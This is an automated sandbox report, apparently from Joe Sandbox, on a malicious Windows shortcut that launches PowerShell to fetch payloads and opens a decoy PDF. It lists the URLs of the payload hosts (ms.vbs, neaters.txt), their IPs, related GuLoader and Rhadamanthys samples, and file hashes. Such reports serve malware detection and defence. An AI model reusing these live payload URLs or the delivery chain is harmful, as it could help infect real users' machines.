      Credential Access: OS Credential Dumping | LSASS Memory | Security Account Manager | NTDS | LSA Secrets | Cached Domain Credentials
      Discovery: 11 Security Software Discovery | 11 Process Discovery | 31 Virtualization/Sandbox Evasion | 1 Application Window Discovery | 1 File and Directory Discovery | 21 System Information Discovery
      Lateral Movement: Remote Services | Remote Desktop Protocol | SMB/Windows Admin Shares | Distributed Component Object Model | SSH | VNC
      Collection: 1 Archive Collected Data | Data from Removable Media | Data from Network Shared Drive | Input Capture | Keylogging | GUI Input Capture
      Command and Control: 11 Encrypted Channel | 3 Ingress Tool Transfer | 3 Non-Application Layer Protocol | 14 Application Layer Protocol | Fallback Channels | Multiband Communication
      Exfiltration: Exfiltration Over Other Network Medium | Exfiltration Over Bluetooth | Automated Exfiltration | Traffic Duplication | Scheduled Transfer | Data Transfer Size Limits
      Impact: Abuse Accessibility Features | Network Denial of Service | Data Encrypted for Impact | Data Destruction | Data Encrypted for Impact | Service Stop
      Behavior Graph (ID: 1578187, Sample: 0bNBLjPn56.lnk, Start date: 19/12/2024, Architecture: WINDOWS, Score: 100). Graph legend as given in the report: Process, Signature, Created File, DNS/IP Info, Is Dropped, Is Windows Process, Number of created Registry Values, Number of created Files, Visual Basic, Delphi, Java, .Net C# or VB.NET, C/C++ or other language, Is malicious, Internet. Nodes and edges recovered from the graph text (the bare numbers after a process name are that node's figures as printed):
      Start node 2 -> DNS/IP: www.astenterprises.com.pk; www.al-rasikh.com; 5 other IPs or domains
      Start node 2 -> Signatures: Antivirus / Scanner detection for submitted sample; Windows shortcut file (LNK) starts blacklisted processes; Multi AV Scanner detection for submitted file; 8 other signatures
      Start node 2 -> started: powershell.exe (node 9; 17 24); svchost.exe (node 13; 1 1)
      powershell.exe (node 9) -> DNS/IP: al-rasikh.com 107.161.23.150, 443, 49721, 49738 RAMNODEUS United States; www.bluemaxxlaser.com 203.175.174.69, 49754, 80 SGGS-AS-APSGGSSG Singapore
      powershell.exe (node 9) -> Signatures: Windows shortcut file (LNK) starts blacklisted processes; Powershell creates an autostart link
      powershell.exe (node 9) -> started: Acrobat.exe (node 15; 20 74); powershell.exe (node 17; 7); conhost.exe (node 19; 1)
      svchost.exe (node 13) -> DNS/IP: 127.0.0.1 unknown unknown
      Acrobat.exe (node 15) -> started: AcroCEF.exe (node 21; 106)
      AcroCEF.exe (node 21) -> started: AcroCEF.exe (node 23; 4)

Source | Detection | Scanner | Label
0bNBLjPn56.lnk | 25% | Virustotal |
0bNBLjPn56.lnk | 29% | ReversingLabs | Shortcut.Trojan.FakeupdateLNK
0bNBLjPn56.lnk | 100% | Avira | LNK/Dldr.Agent.VPUF
0bNBLjPn56.lnk | 100% | Joe Sandbox ML |
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
Source | Detection | Scanner | Label
https://www.astenterprises.com.pk/ms/List%20of%20required%20items%20and%20services.pdf8 | 0% | Avira URL Cloud | safe
http://www.bluemaxxlaser.com/ms/ms.vbs | 0% | Avira URL Cloud | safe
https://www.al-rasikh.com/ms/neaters.txtP | 0% | Avira URL Cloud | safe
http://www.al-rasikh.com | 0% | Avira URL Cloud | safe
http://al-rasikh.com | 0% | Avira URL Cloud | safe
https://www.astenterprises.com.pk/ms/List%20of%20required%20items%20and%20services.pdf | 0% | Avira URL Cloud | safe
https://www.al-rasikh.com | 0% | Avira URL Cloud | safe
https://www.al-rasikh.com/ms/neaters.txt-UseBasicParsing | 0% | Avira URL Cloud | safe
http://www.blujlqmaxxlasjlqr.com/ms/ms.vbs | 0% | Avira URL Cloud | safe
https://www.astjlqntjlqrprisjlqs.com.pk/ms/List%20of%20rjlqquirjlqd%20itjlqms%20and%20sjlqrvicjlqs.p | 0% | Avira URL Cloud | safe
http://www.astenterprises.com.pk | 0% | Avira URL Cloud | safe
https://www.astenterprises.com.pk | 0% | Avira URL Cloud | safe
http://www.blujlqmaxxlasjlqr.com/ms/ms.vbsX | 0% | Avira URL Cloud | safe
http://astenterprises.com.pk | 0% | Avira URL Cloud | safe
https://www.al-rasikh.com/ms/nea | 0% | Avira URL Cloud | safe
http://www.bluemaxxlaser.com | 0% | Avira URL Cloud | safe
https://www.al-rasikh.com/ms/neaters.txt | 0% | Avira URL Cloud | safe
https://www.al-rasikh.com/ms/neaters.txt4p | 0% | Avira URL Cloud | safe
http://www.blujlqmaxxlasjlqr.com/ms/ms. | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
bg.microsoft.map.fastly.net | 199.232.210.172 | true | false | | high
astenterprises.com.pk | 107.161.23.150 | true | false | | unknown
www.bluemaxxlaser.com | 203.175.174.69 | true | false | | unknown
al-rasikh.com | 107.161.23.150 | true | true | | unknown
x1.i.lencr.org | unknown | unknown | false | | high
www.al-rasikh.com | unknown | unknown | true | | unknown
www.astenterprises.com.pk | unknown | unknown | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://www.bluemaxxlaser.com/ms/ms.vbs | false | Avira URL Cloud: safe | unknown
https://www.astenterprises.com.pk/ms/List%20of%20required%20items%20and%20services.pdf | false | Avira URL Cloud: safe | unknown
https://www.al-rasikh.com/ms/neaters.txt | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 00000002.00000002.2442876818.0000026B2DB48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2442876818.0000026B2DA05000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://x1.i.lencr.org/ | 2D85F72862B55C4EADD9E66E06947F3D0.10.dr | false | | high
https://www.astenterprises.com.pk/ms/List%20of%20required%20items%20and%20services.pdf8 | powershell.exe, 00000002.00000002.2389019510.0000026B1F713000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000002.00000002.2389019510.0000026B1DBC2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000002.00000002.2389019510.0000026B1DBC2000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://go.micro | powershell.exe, 00000002.00000002.2389019510.0000026B1E75F000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.al-rasikh.com | powershell.exe, 00000002.00000002.2389019510.0000026B1F041000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contoso.com/License | powershell.exe, 00000002.00000002.2442876818.0000026B2DA05000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.al-rasikh.com/ms/neaters.txt-UseBasicParsing | powershell.exe, 00000002.00000002.2451470735.0000026B35DEC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2386989031.0000026B1BC60000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2353829592.0000026B1BADE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2387303760.0000026B1BCD5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2449512152.0000026B35B4E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2353829592.0000026B1BA87000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2451470735.0000026B35E75000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contoso.com/Icon | powershell.exe, 00000002.00000002.2442876818.0000026B2DA05000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://al-rasikh.com | powershell.exe, 00000002.00000002.2389019510.0000026B1F041000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://g.live.com/odclientsettings/ProdV21C: | svchost.exe, 0000000B.00000003.2347057711.000001EA0D2C0000.00000004.00000800.00020000.00000000.sdmp, edb.log.11.dr | false | | high
https://www.al-rasikh.com/ms/neaters.txtP | powershell.exe, 00000002.00000002.2389019510.0000026B1E75F000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://crl.ver) | svchost.exe, 0000000B.00000002.3460852336.000001EA0D400000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.blujlqmaxxlasjlqr.com/ms/ms.vbs | powershell.exe, 00000002.00000002.2389019510.0000026B1F074000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
https://www.astjlqntjlqrprisjlqs.com.pk/ms/List%20of%20rjlqquirjlqd%20itjlqms%20and%20sjlqrvicjlqs.p | powershell.exe, 00000002.00000002.2389019510.0000026B1F713000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.al-rasikh.com | powershell.exe, 00000002.00000002.2389019510.0000026B1E75F000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
https://github.com/Pester/Pester | powershell.exe, 00000002.00000002.2389019510.0000026B1DBC2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.astenterprises.com.pk | powershell.exe, 00000002.00000002.2389019510.0000026B1F902000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://astenterprises.com.pk | powershell.exe, 00000002.00000002.2389019510.0000026B1F902000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://g.live.com/odclientsettings/Prod1C: | qmgr.db.11.dr | false | | high
https://www.astenterprises.com.pk | powershell.exe, 00000002.00000002.2389019510.0000026B1F713000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.blujlqmaxxlasjlqr.com/ms/ms.vbsX | powershell.exe, 00000002.00000002.2389019510.0000026B1F0C2000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.bluemaxxlaser.com | powershell.exe, 00000002.00000002.2389019510.0000026B1F978000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contoso.com/ | powershell.exe, 00000002.00000002.2442876818.0000026B2DA05000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://nuget.org/nuget.exe | powershell.exe, 00000002.00000002.2442876818.0000026B2DB48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2442876818.0000026B2DA05000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.al-rasikh.com/ms/nea | powershell.exe, 00000002.00000002.2389019510.0000026B1DBC2000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
http://www.blujlqmaxxlasjlqr.com/ms/ms. | powershell.exe, 00000002.00000002.2389019510.0000026B1F0C2000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
https://www.al-rasikh.com/ms/neaters.txt4p | powershell.exe, 00000002.00000002.2353829592.0000026B1BA87000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://aka.ms/pscore68 | powershell.exe, 00000002.00000002.2389019510.0000026B1D991000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2266815874.0000027DD5E7B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2266815874.0000027DD5E8E000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000002.00000002.2389019510.0000026B1D991000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2266815874.0000027DD5EB5000.00000004.00000800.00020000.00000000.sdmp | false | | high
                                                  • No. of IPs < 25%
                                                  • 25% < No. of IPs < 50%
                                                  • 50% < No. of IPs < 75%
                                                  • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
203.175.174.69 | www.bluemaxxlaser.com | Singapore | 24482 | SGGS-AS-APSGGSSG | false
107.161.23.150 | astenterprises.com.pk | United States | 3842 | RAMNODEUS | true
                                                  IP
                                                  127.0.0.1
                                                  Joe Sandbox version:41.0.0 Charoite
                                                  Analysis ID:1578187
                                                  Start date and time:2024-12-19 11:55:09 +01:00
                                                  Joe Sandbox product:CloudBasic
                                                  Overall analysis duration:0h 5m 23s
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:full
                                                  Cookbook file name:default.jbs
                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:22
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:0
                                                  Technologies:
                                                  • HCA enabled
                                                  • EGA enabled
                                                  • AMSI enabled
                                                  Analysis Mode:default
                                                  Analysis stop reason:Timeout
                                                  Sample name:0bNBLjPn56.lnk
                                                  renamed because original name is a hash value
                                                  Original Sample Name:18606c684a9f169298350be1dc11f222d27c68789953f78d0feedfea90d07c53.lnk
                                                  Detection:MAL
                                                  Classification:mal100.evad.winLNK@20/58@5/3
                                                  EGA Information:Failed
                                                  HCA Information:
                                                  • Successful, ratio: 100%
                                                  • Number of executed functions: 10
                                                  • Number of non-executed functions: 9
                                                  Cookbook Comments:
                                                  • Found application associated with file extension: .lnk
                                                  • Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe
                                                  • Excluded IPs from analysis (whitelisted): 23.218.208.137, 162.159.61.3, 172.64.41.3, 34.237.241.83, 54.224.241.105, 50.16.47.176, 18.213.11.84, 23.218.208.109, 23.195.61.56, 2.19.198.27, 2.19.198.16, 23.32.239.65, 23.32.239.56, 23.32.239.9, 20.234.120.54, 23.32.239.34, 2.19.198.32, 20.231.128.67, 20.223.36.55, 13.107.246.63, 150.171.27.10, 52.149.20.212, 23.47.168.24, 20.74.47.205
                                                  • Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, asf-ris-prod-neu-azsc.northeurope.cloudapp.azure.com, tse1.mm.bing.net, g.bing.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, acroipm2.adobe.com, ocsp.digicert.com, ssl-delivery.adobe.com.edgekey.net, login.live.com, e16604.g.akamaiedge.net, a122.dscd.akamai.net, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net, client.wns.windows.com, fs.microsoft.com, otelrules.azureedge.net, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com.delivery.microsoft.com, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, p13n.adobe.io, fe3cr.delivery.mp.microsoft.com, ris.api.iris.microsoft.com, armmf.adobe.com, geo2.adobe.com
                                                  • Execution Graph export aborted for target powershell.exe, PID 2744 because it is empty
                                                  • Execution Graph export aborted for target powershell.exe, PID 7552 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
05:56:09 | API Interceptor | 39x Sleep call for process: powershell.exe modified
05:56:22 | API Interceptor | 2x Sleep call for process: svchost.exe modified
05:56:32 | API Interceptor | 1x Sleep call for process: AcroCEF.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
203.175.174.69 | 64Tgzu2FKh.exe | malicious | GuLoader, RHADAMANTHYS | bluemaxxlaser.com/rh/rheu.bin
203.175.174.69 | zp.exe | malicious | GuLoader, RHADAMANTHYS | bluemaxxlaser.com/rh/rh.bin
203.175.174.69 | eua.ps1 | malicious | GuLoader | www.bluemaxxlaser.com/rh/List%20of%20required%20items%20and%20services.pdf
203.175.174.69 | zp.ps1 | malicious | Unknown | www.bluemaxxlaser.com/rh/List%20of%20required%20items%20and%20services.pdf
203.175.174.69 | zk.ps1 | malicious | Unknown | www.bluemaxxlaser.com/rh/List%20of%20required%20items%20and%20services.pdf
203.175.174.69 | mx.ps1 | malicious | Unknown | www.bluemaxxlaser.com/rh/List%20of%20required%20items%20and%20services.pdf
203.175.174.69 | zpeu.exe | malicious | GuLoader | bluemaxxlaser.com/rh/rheu.bin
203.175.174.69 | as.ps1 | malicious | GuLoader | www.bluemaxxlaser.com/rh/List%20of%20required%20items%20and%20services.pdf
107.161.23.150 | List of required items and services.pdf.vbs | malicious | GuLoader, RHADAMANTHYS |
107.161.23.150 | List of required items pdf.vbs | malicious | GuLoader |
107.161.23.150 | List of required items and services pdf.vbs | malicious | GuLoader |
107.161.23.150 | List of required items pdf.vbs | malicious | GuLoader |
107.161.23.150 | List of required items and services pdf.vbs | malicious | GuLoader |
107.161.23.150 | xw0K5Lahxz.exe | malicious | Unknown |
Match | Associated Sample Name / URL | Detection | Threat Name | Context
www.bluemaxxlaser.com | eua.ps1 | malicious | GuLoader | 203.175.174.69
www.bluemaxxlaser.com | zp.ps1 | malicious | Unknown | 203.175.174.69
www.bluemaxxlaser.com | zk.ps1 | malicious | Unknown | 203.175.174.69
www.bluemaxxlaser.com | mx.ps1 | malicious | Unknown | 203.175.174.69
www.bluemaxxlaser.com | as.ps1 | malicious | GuLoader | 203.175.174.69
bg.microsoft.map.fastly.net | Dix7g8PK1e.pdf | malicious | Unknown | 199.232.210.172
bg.microsoft.map.fastly.net | CROC000400 .pdf | malicious | Unknown | 199.232.210.172
bg.microsoft.map.fastly.net | contract_signed.pdf | malicious | Unknown | 199.232.214.172
bg.microsoft.map.fastly.net | T.T_Copy.12.18.2024.exe | malicious | ArrowRAT | 199.232.214.172
bg.microsoft.map.fastly.net | 22054200882739718047.js | malicious | Strela Downloader | 199.232.214.172
bg.microsoft.map.fastly.net | Sh2uIqqKqc.exe | malicious | Cryptbot | 199.232.214.172
bg.microsoft.map.fastly.net | alyemenione.lnk | malicious | Havoc, Quasar | 199.232.214.172
bg.microsoft.map.fastly.net | R8CAg00Db8.lnk | malicious | Unknown | 199.232.214.172
bg.microsoft.map.fastly.net | A file has been sent to you via DROPBOX.pdf | malicious | Unknown | 199.232.210.172
bg.microsoft.map.fastly.net | PyIsvSahWy.exe | malicious | Unknown | 199.232.210.172
Match | Associated Sample Name / URL | Detection | Threat Name | Context
RAMNODEUS | List of required items and services.pdf.vbs | malicious | GuLoader, RHADAMANTHYS | 107.161.23.150
RAMNODEUS | List of required items pdf.vbs | malicious | GuLoader | 107.161.23.150
RAMNODEUS | List of required items and services pdf.vbs | malicious | GuLoader | 107.161.23.150
RAMNODEUS | List of required items pdf.vbs | malicious | GuLoader | 107.161.23.150
RAMNODEUS | List of required items and services pdf.vbs | malicious | GuLoader | 107.161.23.150
RAMNODEUS | owari.x86.elf | malicious | Unknown | 168.235.88.56
RAMNODEUS | owari.ppc.elf | malicious | Unknown | 168.235.65.115
RAMNODEUS | i486.elf | malicious | Mirai | 168.235.88.39
RAMNODEUS | na.elf | malicious | Unknown | 107.161.24.95
RAMNODEUS | na.elf | malicious | Unknown | 107.161.24.95
SGGS-AS-APSGGSSG | teste.x86.elf | malicious | Mirai, Moobot, Okiru | 103.14.247.60
SGGS-AS-APSGGSSG | na.elf | malicious | Gafgyt | 103.14.247.29
SGGS-AS-APSGGSSG | na.elf | malicious | Gafgyt | 103.14.247.60
SGGS-AS-APSGGSSG | jZ6ejWIrSV.elf | malicious | Gafgyt, Mirai | 103.14.247.64
SGGS-AS-APSGGSSG | IGvLaRmr0J.elf | malicious | Gafgyt, Mirai | 103.14.247.58
SGGS-AS-APSGGSSG | wget.elf | malicious | Gafgyt | 103.14.247.62
SGGS-AS-APSGGSSG | 4v7myD9mN2OaWZp.exe | malicious | AgentTesla | 203.175.171.5
SGGS-AS-APSGGSSG | rNNA.exe | malicious | AgentTesla | 203.175.171.5
SGGS-AS-APSGGSSG | wg2vKIF0SU.elf | malicious | Gafgyt | 103.14.247.45
SGGS-AS-APSGGSSG | LF6B2XTwcV.elf | malicious | Gafgyt, Mirai | 103.14.247.32
Match | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e | t5lpvahkgypd7wy.vbs | malicious | GuLoader, RHADAMANTHYS | 107.161.23.150
3b5074b1b5d032e5620f69f9f700ff0e | RFQ Letter and Instructions.pdf | malicious | Unknown | 107.161.23.150
3b5074b1b5d032e5620f69f9f700ff0e | File di reclamo per violazione del copyright File di reclamo per violazione del copyright.lnk.d.lnk | malicious | Unknown | 107.161.23.150
3b5074b1b5d032e5620f69f9f700ff0e | File di reclamo per violazione del copyright File di reclamo per violazione del copyright.lnk.d.lnk | malicious | Unknown | 107.161.23.150
3b5074b1b5d032e5620f69f9f700ff0e | DHL_231437894819.bat.exe | malicious | AgentTesla | 107.161.23.150
3b5074b1b5d032e5620f69f9f700ff0e | 4089137200.exe | malicious | AgentTesla | 107.161.23.150
3b5074b1b5d032e5620f69f9f700ff0e | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Stealc, Vidar | 107.161.23.150
3b5074b1b5d032e5620f69f9f700ff0e | Dix7g8PK1e.pdf | malicious | Unknown | 107.161.23.150
3b5074b1b5d032e5620f69f9f700ff0e | Corporate_Code_of_Ethics_and_Business_Conduct_Policy_2024.pdf.lnk.d.lnk | malicious | RHADAMANTHYS | 107.161.23.150
3b5074b1b5d032e5620f69f9f700ff0e | main1.bat | malicious | Abobus Obfuscator | 107.161.23.150
                                                              No context
                                                              Process:C:\Windows\System32\svchost.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):1310720
                                                              Entropy (8bit):0.7263338755130785
                                                              Encrypted:false
                                                              SSDEEP:1536:9J8s6YR3pnhWKInznxTgScwXhCeEcrKYSZNmTHk4UQJ32aqGT46yAwFM5hA7yH0T:9JZj5MiKNnNhoxum
                                                              MD5:1DF35FB4E56EF8B9ED983BB72F38ECB1
                                                              SHA1:C5E779988CC0B76609F52CF3E79D5BDEC497A319
                                                              SHA-256:6DD28495B922F7CB6CF306C780960D3E1E33E8E404280488943387B6BA45B976
                                                              SHA-512:79030411D34490873C7A40D1B284335AE62AF87EBB50F17FF469D9951229802AEF51DD754A8D53CA5F68FD2CA3F1E53095BD2F55650D349C091F2BE163BD6F4B
                                                              Malicious:false
                                                              Reputation:low
                                                              Preview:...........@..@9....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@....................................Fajaj.#.........`h.................h.......6.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................
                                                              Process:C:\Windows\System32\svchost.exe
                                                              File Type:Extensible storage user DataBase, version 0x620, checksum 0xd6aba6ab, page size 16384, DirtyShutdown, Windows version 10.0
                                                              Category:dropped
                                                              Size (bytes):1310720
                                                              Entropy (8bit):0.7556156320035918
                                                              Encrypted:false
                                                              SSDEEP:1536:dSB2ESB2SSjlK/svFH03N9Jdt8lYkr3g16xj2UPkLk+kLWyrufTRryrUYc//kbxW:dazaSvGJzYj2UlmOlOL
                                                              MD5:BBE470D580C80FE426015C3F17E1D922
                                                              SHA1:9F3EF83D3BE6147D87B2912930A69A77DA79C1E1
                                                              SHA-256:2E0973823476E6C8FCAAD58788BB9C3322A2C42888B7EB17090237706C29E33D
                                                              SHA-512:0CA707793E7A1E7E6D0D32003C7D7AD1D707C2989B19AD72A78454D2D1BF67B9A500AF98115770989AC4157FACB28E74AFB5E3F7CA7A14A6F6ED0514B65E8E9A
                                                              Malicious:false
                                                              Reputation:low
                                                              Preview:...... .......7.......X\...;...{......................0.e......!...{?..8...|..h.g.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... .......9....{...............................................................................................................................................................................................2...{....................................mw.8...|..................M..s.8...|...........................#......h.g.....................................................................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Windows\System32\svchost.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):16384
                                                              Entropy (8bit):0.07857276432469026
                                                              Encrypted:false
                                                              SSDEEP:3:eYeEE+vfNaAPaU1ly1lalluxmO+l/SNxOf:ezcNDPaUa1AgmOH
                                                              MD5:DAB295A7FDCE7E1FD18ED578167B1039
                                                              SHA1:CE8DC8B820918464D274E0254DB186A780C2A74B
                                                              SHA-256:C7EBE5DCF2AD97F3F8DBB616A08E4D7FA51153E66F447192B8C2FFD9FF998243
                                                              SHA-512:E1D9088F4D337DDC7E33A256E4363DE850FE50B05486B57326B7725E0AB4541275FF3D0150E18BD5D7076B856012DA7E3B34803BBF571B2F71D06D93DA20F903
                                                              Malicious:false
                                                              Preview:6.zU.....................................;...{...8...|...!...{?..........!...{?..!...{?..g...!...{?.................M..s.8...|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):298
                                                              Entropy (8bit):5.221942875502474
                                                              Encrypted:false
                                                              SSDEEP:6:7WGcxFU89+q2PN72nKuAl9OmbnIFUt8OWGc/FN3JZmw+OWGc/FN39VkwON72nKui:7WGyUrvVaHAahFUt8OWGoV/+OWGoH5Oz
                                                              MD5:348759100D775A2425B85A64DFE7F9F0
                                                              SHA1:73BECB35C02BA2BDFDAAA009FC52CECC0A1989EC
                                                              SHA-256:AEA09028EFE326CF9DA038BB4B18868559334675CA99C63DD6B2CCDCF8CB2FF7
                                                              SHA-512:8019BA512D4EBD313E74066B1824FBF3FA83F7184DC2A2C839DFC312484421BE861C9BA6514EAE4B868FCF66B1C64273BAA56B449D3C5985313F863EA750019F
                                                              Malicious:false
                                                              Preview:2024/12/19-05:56:21.707 1c08 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/19-05:56:21.709 1c08 Recovering log #3.2024/12/19-05:56:21.709 1c08 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):336
                                                              Entropy (8bit):5.167326899942531
                                                              Encrypted:false
                                                              SSDEEP:6:7WGcJMq2PN72nKuAl9Ombzo2jMGIFUt8OWGcJtvwgZmw+OWGcJtvwIkwON72nKuA:7WGkMvVaHAa8uFUt8OWGkSg/+OWGkSIi
                                                              MD5:93ABCD3BF11AA77629C5400ABEE4E619
                                                              SHA1:ECDE0CAC31810E840428375250ED7CCE4385C7FC
                                                              SHA-256:9E7056573405C1157F6C9D5A8DB347065675AE92C59B65DF9AC222127D10B714
                                                              SHA-512:A7956BE343C8FD3AFE2D43ACD9B014EF643CBBB3726C4EB9246EE808C5068D534A821267924C45F5A81BB6CFCE4E49153C0C140708B79BCB8C99EBD3559D16BE
                                                              Malicious:false
                                                              Preview:2024/12/19-05:56:21.912 40 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/19-05:56:21.914 40 Recovering log #3.2024/12/19-05:56:21.914 40 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                              File Type:JSON data
                                                              Category:dropped
                                                              Size (bytes):475
                                                              Entropy (8bit):4.971824627296864
                                                              Encrypted:false
                                                              SSDEEP:12:YH/um3RA8sq1ZhsBdOg2HIJnAcaq3QYiubcP7E4TX:Y2sRdswydMH0r3QYhbA7n7
                                                              MD5:F326539D084B03D88254A74D6018F692
                                                              SHA1:395B367E0E3554C3E78A8211F2D4B9F0F427CA87
                                                              SHA-256:9379694CADD7846403E1B6975502326FBC619E0E3A873BBB7BC2C03EE3623007
                                                              SHA-512:C8B5B1DD28605D3FCD9EF4A28BE1125137E6B3CB967F59CB2113656C8EFFFB3842115962DF8B25E9C3FA504F5E1B0A116D780326B1AB8062DC6AC0D80E7C3539
                                                              Malicious:false
                                                              Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341048370594526","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":151499},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.6","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                              File Type:JSON data
                                                              Category:modified
                                                              Size (bytes):475
                                                              Entropy (8bit):4.975316331738347
                                                              Encrypted:false
                                                              SSDEEP:12:YH/um3RA8sqIEsBdOg2Hkfcaq3QYiubcP7E4TX:Y2sRds9dMHj3QYhbA7n7
                                                              MD5:54FE5726D4AFD840531272898C5E0DA8
                                                              SHA1:C170210857BCEA83E772A23541430ED295B6F827
                                                              SHA-256:D92EF1A8BC0B231CD5EF5513051026ED314CB2E66C73536CEFC77CD4AE9AF49C
